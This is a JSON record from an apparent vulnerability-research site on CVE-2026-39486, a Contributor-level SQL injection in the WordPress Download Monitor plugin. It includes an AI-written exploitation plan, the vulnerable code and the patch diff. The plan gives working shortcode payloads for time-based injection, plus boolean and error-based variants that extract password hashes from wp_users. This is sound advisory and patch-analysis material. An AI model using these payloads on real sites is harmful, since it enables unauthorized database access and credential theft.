[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdxJRBVKC7uSvJtj2vaD_RcUGc3EJiiovgeX5vUxxbcI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-39486","download-monitor-authenticated-contributor-sql-injection","Download Monitor \u003C= 5.1.8 - Authenticated (Contributor+) SQL Injection","The Download Monitor plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.1.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","download-monitor",null,"\u003C=5.1.8","5.1.9","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-25 00:00:00","2026-04-15 21:24:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F60496696-7cb9-44b1-a622-7ee427530c9d?source=api-prod",22,[22,23,24,25,26,27],"changelog.txt","download-monitor.php","includes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php","readme.txt","src\u002FShortcodes.php","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"# Research Plan: CVE-2026-39486 - Download Monitor SQL Injection\n\n## 1. Vulnerability Summary\nThe Download Monitor plugin (\u003C= 5.1.8) is vulnerable to an authenticated SQL injection. The issue resides in the way the plugin handles query ordering and sorting, specifically within its backwards compatibility logic and shortcode processing. When a user with Contributor-level access or higher uses the `[downloads]` shortcode with a malicious `order` or `orderby` attribute, the input is improperly handled and concatenated into a `posts_orderby` filter, allowing for the injection of arbitrary SQL commands.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: The injection occurs when rendering the `[downloads]` shortcode. This can be triggered by a Contributor+ user creating a post\u002Fpage (or previewing one) containing the shortcode.\n*   **Vulnerable Action**: Shortcode rendering for `[downloads]`.\n*   **Vulnerable Parameter**: `order` or `orderby` attribute within the shortcode.\n*   **Authentication Level**: Authenticated (Contributor+). Contributors can create and preview posts.\n*   **Preconditions**: At least one download must exist in the system so that the shortcode's query returns results and triggers the `posts_orderby` logic.\n\n## 3. Code Flow\n1.  **Entry Point**: A user creates\u002Fpreviews a post with `[downloads order=\"DESC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"]`.\n2.  **Shortcode Handling**: `DLM_Shortcodes::downloads` (in `src\u002FShortcodes.php`) parses the attributes using `shortcode_atts`.\n3.  **Repository Call**: The attributes are passed to `DLM_Download_Repository::retrieve()`.\n4.  **Filter Trigger**: The repository applies the filter `dlm_query_args`.\n5.  **Backwards Compatibility**: `DLM_Backwards_Compatibility::orderby_compatibility()` (in `includes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php`) is hooked to `dlm_query_args`.\n6.  **Filter Registration**: If specific criteria are met (e.g., `orderby` is set to `meta_value_num` or `order_by_count` is used), it adds a filter to `posts_orderby` via `add_filter( 'posts_orderby', array( $this, 'orderby_download_count_compatibility' ) )`.\n7.  **Vulnerable Sink**: `orderby_download_count_compatibility` (and associated methods) concatenates the `order` attribute directly into the SQL string without using `$wpdb->prepare` or sufficient whitelisting\u002Fescaping.\n8.  **Execution**: WordPress executes the modified query during the post preview\u002Frender, triggering the `SLEEP()` command.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited via **Shortcode Rendering** in a post preview. Post previews in WordPress generally do **not** require a plugin-specific nonce to execute shortcodes; they rely on the user's authentication cookies and the standard WordPress `post.php` preview mechanism.\n\n**If an AJAX endpoint (like the Reports interface) is the target instead**:\n1.  Navigate to the Download Monitor Reports page.\n2.  Use `browser_eval` to extract the nonce:\n    *   `browser_eval(\"window.dlm_reports_vars?.nonce\")`\n3.  However, for a Contributor-level exploit, the **shortcode preview** is the most reliable and direct path.\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection via the `order` attribute of the `[downloads]` shortcode.\n\n1.  **Login**: Authenticate as a Contributor.\n2.  **Setup**: Ensure a download exists (using WP-CLI).\n3.  **Create Payload Post**: Use the `http_request` tool to create a draft post containing the malicious shortcode.\n4.  **Execute Injection**: Navigate to the preview URL of that post.\n5.  **Payload**:\n    `[downloads orderby=\"ID\" order=\"DESC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"]`\n6.  **HTTP Request (Preview)**:\n    *   Method: `GET`\n    *   URL: `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]&preview=true` (Standard WP preview URL)\n    *   Observe: The response time should be >= 5 seconds.\n\n## 6. Test Data Setup\n1.  **Create Download**:\n    `wp post create --post_type=dlm_download --post_title=\"Test Download\" --post_status=publish`\n2.  **Create Contributor User**:\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Create Exploit Post (as Contributor)**:\n    `wp post create --post_type=post --post_title=\"Exploit\" --post_content='[downloads orderby=\"ID\" order=\"ASC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"]' --post_author=[CONTRIBUTOR_ID] --post_status=draft`\n\n## 7. Expected Results\n*   A normal preview request should complete in \u003C 1 second.\n*   The exploit request (with the `SLEEP(5)` payload) should take significantly longer (approx. 5 seconds per matching row in the query, though usually limited by the shortcode's default `posts_per_page`).\n*   The database engine executes the sleep command as part of the `ORDER BY` clause.\n\n## 8. Verification Steps\n1.  **Check Query Logs**: If possible, check the MySQL general log to see the executed query:\n    `SELECT ... ORDER BY ... ASC, (SELECT 1 FROM (SELECT(SLEEP(5)))a) ...`\n2.  **Database state**: Confirm the Contributor user exists and can view the preview.\n3.  **Timing Analysis**: Use the `time_total` from the Playwright\u002Fhttp_request tool to confirm the delay.\n\n## 9. Alternative Approaches\n*   **Boolean-Based**: Use `IF(1=1, ID, title)` to see if the sort order changes, then substitute `1=1` with a subquery like `(SELECT 1 FROM wp_users WHERE user_login='admin' AND user_pass LIKE '$P$%')`.\n*   **Error-Based**: Use `GTID_SUBSET(CONCAT(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)` if the plugin or environment displays database errors.\n*   **Reports Endpoint**: If the shortcode is patched but the Reports interface is not, target `admin-ajax.php?action=dlm_reports_data` with a payload in the `order_by` or `order` JSON parameter. This would require a nonce usually found in `dlm_reports_vars`.","The Download Monitor plugin for WordPress is vulnerable to authenticated SQL Injection via the 'order' attribute in the [downloads] shortcode. Contributor-level users and above can exploit this to inject arbitrary SQL commands into the ORDER BY clause of database queries, potentially leading to unauthorized data extraction.","\u002F\u002F src\u002FShortcodes.php line 408\n$order          = strtoupper( $order );\n\n---\n\n\u002F\u002F includes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php line 285\nif ( isset( $this->filters['order'] ) ) {\n\n\t$order = $this->filters['order'];\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php\t2024-11-28 14:28:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fincludes\u002Fbackwards-compatibility\u002Fclass-dlm-backwards-compatibility.php\t2026-03-04 11:41:50.000000000 +0000\n@@ -285,7 +285,9 @@\n \n \t\tif ( isset( $this->filters['order'] ) ) {\n \n-\t\t\t$order = $this->filters['order'];\n+\t\t\t$order = in_array( strtoupper( $this->filters['order'] ), array( 'ASC', 'DESC' ), true )\n+\t\t\t\t? strtoupper( $this->filters['order'] )\n+\t\t\t\t: 'DESC';\n \t\t}\n \n \t\tif ( apply_filters( 'dlm_count_meta_downloads', true ) ) {\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fsrc\u002FShortcodes.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fsrc\u002FShortcodes.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.8\u002Fsrc\u002FShortcodes.php\t2024-11-28 14:28:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdownload-monitor\u002F5.1.9\u002Fsrc\u002FShortcodes.php\t2026-03-04 11:41:50.000000000 +0000\n@@ -406,6 +406,7 @@\n \t\t\t\t$exclude_tag\n \t\t\t) : '';\n \t\t\t$order          = strtoupper( $order );\n+\t\t\t$order          = in_array( $order, array( 'ASC', 'DESC' ), true ) ? $order : 'DESC';\n \t\t\t$meta_key       = '';\n \t\t\t$order_by_count = '';","The exploit targets the [downloads] shortcode processing logic. An attacker with Contributor-level privileges (who can create and preview posts) initiates the attack by creating a post or page containing the [downloads] shortcode with a maliciously crafted 'order' attribute. Specifically, the 'order' attribute is supplied with a value like 'DESC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)', which is concatenated into the SQL ORDER BY clause by the plugin's backwards compatibility layer for download counts. When the attacker previews the post, WordPress renders the shortcode, causing the underlying SQL query to execute the SLEEP() command, confirming the time-based injection. This technique can be extended to extract sensitive database information using boolean-based or error-based payloads.","gemini-3-flash-preview","2026-04-17 22:58:58","2026-04-17 22:59:46",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","5.1.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags"]